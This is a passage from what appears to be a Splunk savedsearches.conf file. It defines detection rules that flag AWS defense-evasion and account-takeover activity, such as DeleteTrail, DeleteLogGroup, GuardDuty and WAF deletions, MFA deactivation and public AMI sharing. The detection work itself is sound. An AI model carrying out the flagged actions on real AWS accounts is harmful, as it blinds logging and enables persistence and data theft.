["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the the entire cloudtrail that is logging activities in the environment. action.notable.param.rule_title = ASL AWS Defense Evasion Delete Cloudtrail action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=DeleteTrail | stats count min(_time) as firstTime max(_time) as lastTime by identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `asl_aws_defense_evasion_delete_cloudtrail_filter` [ESCU - ASL AWS Defense Evasion Delete CloudWatch Log Group - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has deleted CloudWatch logging. Please investigate this activity. action.escu.creation_date = 2023-05-31 action.escu.modification_date = 2023-05-31 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Defense Evasion Delete CloudWatch Log Group - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $identity.user.name$ has deleted a CloudWatch logging group for account id $identity.user.account_uid$ action.risk.param._risk = [{"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}, {"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS Defense Evasion Delete CloudWatch Log Group - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment. action.notable.param.rule_title = ASL AWS Defense Evasion Delete CloudWatch Log Group action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=DeleteLogGroup | stats count min(_time) as firstTime max(_time) as lastTime by identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `asl_aws_defense_evasion_delete_cloudwatch_log_group_filter` [ESCU - ASL AWS Defense Evasion Impair Security Services - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic looks for several delete specific API calls made to AWS Security Services like CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses by deleting logging configurations in the CloudWatch alarm, delete a set of detectors from your Guardduty environment or simply delete a bunch of CloudWatch alarms to remain stealthy and avoid detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Web"] action.escu.eli5 = This analytic looks for several delete specific API calls made to AWS Security Services like CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses by deleting logging configurations in the CloudWatch alarm, delete a set of detectors from your Guardduty environment or simply delete a bunch of CloudWatch alarms to remain stealthy and avoid detection. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = While this search has no known false positives, it is possible that it is a legitimate admin activity. Please consider filtering out these noisy events using userAgent, user_arn field names. action.escu.creation_date = 2023-06-01 action.escu.modification_date = 2023-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Defense Evasion Impair Security Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS Defense Evasion"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS Defense Evasion Impair Security Services - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation IN ("DeleteLogStream","DeleteDetector","DeleteIPSet","DeleteWebACL","DeleteRule","DeleteRuleGroup","DeleteLoggingConfiguration","DeleteAlarms") | stats count min(_time) as firstTime max(_time) as lastTime by api.operation identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `asl_aws_defense_evasion_impair_security_services_filter` [ESCU - ASL AWS Excessive Security Scanning - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events and analyse the amount of eventNames which starts with Describe by a single user. This indicates that this user scans the configuration of your AWS cloud environment. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events and analyse the amount of eventNames which starts with Describe by a single user. This indicates that this user scans the configuration of your AWS cloud environment. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = While this search has no known false positives. action.escu.creation_date = 2023-06-01 action.escu.modification_date = 2023-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Excessive Security Scanning - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS User Monitoring"] action.risk = 1 action.risk.param._risk_message = user $identity.user.name$ has excessive number of api calls. action.risk.param._risk = [{"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}, {"risk_object_field": "identity.user.name", "risk_object_type": "other", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS Excessive Security Scanning - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=Describe* OR api.operation=List* OR api.operation=Get* | stats dc(api.operation) as dc_api_operations min(_time) as firstTime max(_time) as lastTime values(http_request.user_agent) as http_request.user_agent values(src_endpoint.ip) as src_endpoint.ip values(cloud.region) as cloud.region values(identity.user.account_uid) as identity.user.account_uid by identity.user.name | where dc_api_operations > 50 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`|`asl_aws_excessive_security_scanning_filter` [ESCU - ASL AWS IAM Delete Policy - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following detection identifes when a policy is deleted on AWS. This does not identify whether successful or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy , DetachGroupPolicy , or DetachRolePolicy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following detection identifes when a policy is deleted on AWS. This does not identify whether successful or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy , DetachGroupPolicy , or DetachRolePolicy. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilties. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete policies (least privilege). In addition, this may be saved seperately and tuned for failed or success attempts only. action.escu.creation_date = 2023-06-02 action.escu.modification_date = 2023-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS IAM Delete Policy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS IAM Delete Policy - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=DeletePolicy | stats count min(_time) as firstTime max(_time) as lastTime by api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_iam_delete_policy_filter` [ESCU - ASL AWS Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = AWS Administrators may disable MFA but it is highly unlikely for this event to occur without prior notice to the company action.escu.creation_date = 2023-06-02 action.escu.modification_date = 2023-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ has disabled Multi-Factor authentication for AWS account $aws_account_id$ action.risk.param._risk = [{"risk_object_field": "identity.user.account_uid", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - ASL AWS Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = ASL AWS Multi-Factor Authentication Disabled action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` (api.operation=DeleteVirtualMFADevice OR api.operation=DeactivateMFADevice) | stats count min(_time) as firstTime max(_time) as lastTime by api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_multi_factor_authentication_disabled_filter` [ESCU - ASL AWS New MFA Method Registered For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account logged through Amazon Secruity Lake (ASL). Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account logged through Amazon Secruity Lake (ASL). Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = Newly onboarded users who are registering an MFA method for the first time will also trigger this detection. action.escu.creation_date = 2023-05-22 action.escu.modification_date = 2023-05-22 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS New MFA Method Registered For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new virtual device is added to user $identity.user.name$ action.risk.param._risk = [{"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ASL AWS New MFA Method Registered For User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account logged through Amazon Secruity Lake (ASL). Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.notable.param.rule_title = ASL AWS New MFA Method Registered For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` api.operation=CreateVirtualMFADevice | stats count min(_time) as firstTime max(_time) as lastTime by api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_new_mfa_method_registered_for_user_filter` [ESCU - ASL AWS Password Policy Changes - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events from Amazon Security Lake where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious, adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events from Amazon Security Lake where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious, adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised. action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876) that includes includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF)format. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately triggered an AWS audit tool activity which may trigger this event. action.escu.creation_date = 2023-05-22 action.escu.modification_date = 2023-05-22 action.escu.confidence = high action.escu.full_search_name = ESCU - ASL AWS Password Policy Changes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Security Lake"] action.escu.analytic_story = ["AWS IAM Privilege Escalation", "Compromised User Account"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ASL AWS Password Policy Changes - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `amazon_security_lake` "api.service.name"="iam.amazonaws.com" "api.operation" IN ("UpdateAccountPasswordPolicy","GetAccountPasswordPolicy","DeleteAccountPasswordPolicy") "api.response.error"=null | stats count min(_time) as firstTime max(_time) as lastTime by identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_password_policy_changes_filter` [ESCU - AWS AMI Attribute Modification for Exfiltration - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for suspicious AWS AMI attribute modifications, such as sharing it with another AWS account or making the full AMI image public. Adversaries are known to abuse these APIs to exfiltrate sensitive organization information stored in the AWS Resources, there by its very important to monitor these seemingly benign API activity in Cloudtrail logs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for suspicious AWS AMI attribute modifications, such as sharing it with another AWS account or making the full AMI image public. Adversaries are known to abuse these APIs to exfiltrate sensitive organization information stored in the AWS Resources, there by its very important to monitor these seemingly benign API activity in Cloudtrail logs. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that an AWS admin has legitimately shared a snapshot with others for a specific purpose. action.escu.creation_date = 2023-03-31 action.escu.modification_date = 2023-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS AMI Attribute Modification for Exfiltration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = AWS AMI from account $aws_account_id$ is shared externally with $accounts_added$ from $src_ip$ or AMI made is made Public. action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 80}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS AMI Attribute Modification for Exfiltration - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for suspicious AWS AMI attribute modifications, such as sharing it with another AWS account or making the full AMI image public. Adversaries are known to abuse these APIs to exfiltrate sensitive organization information stored in the AWS Resources, there by its very important to monitor these seemingly benign API activity in Cloudtrail logs. action.notable.param.rule_title = AWS AMI Attribute Modification for Exfiltration action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ModifyImageAttribute (requestParameters.launchPermission.add.items{}.userId = * OR requestParameters.launchPermission.add.items{}.group = all) | rename requestParameters.launchPermission.add.items{}.group as group_added | rename requestParameters.launchPermission.add.items{}.userId as accounts_added | eval ami_status=if(match(group_added,"all") ,"Public AMI", "Not Public") | stats count min(_time) as firstTime max(_time) as lastTime values(group_added) values(accounts_added) as accounts_added values(ami_status) by src_ip region eventName userAgent user_arn aws_account_id userIdentity.principalId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_ami_attribute_modification_for_exfiltration_filter` [ESCU - AWS Concurrent Sessions From Different Ips - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.escu.how_to_implement = You must install Splunk AWS Add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = A user with concurrent sessions from different Ips may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment. action.escu.creation_date = 2023-02-01 action.escu.modification_date = 2023-02-01 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Concurrent Sessions From Different Ips - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Compromised User Account", "AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has concurrent sessions from more than one unique IP address $src_ip$ in the span of 5 minutes. action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Concurrent Sessions From Different Ips - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.notable.param.rule_title = AWS Concurrent Sessions From Different Ips action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = DescribeEventAggregates src_ip!="AWS Internal" | bin span=5m _time | stats values(userAgent) values(eventName) values(src_ip) as src_ip dc(src_ip) as distinct_ip_count by _time user_arn | where distinct_ip_count > 1 | `aws_concurrent_sessions_from_different_ips_filter` [ESCU - AWS Console Login Failed During MFA Challenge - Rule] action.escu = 0 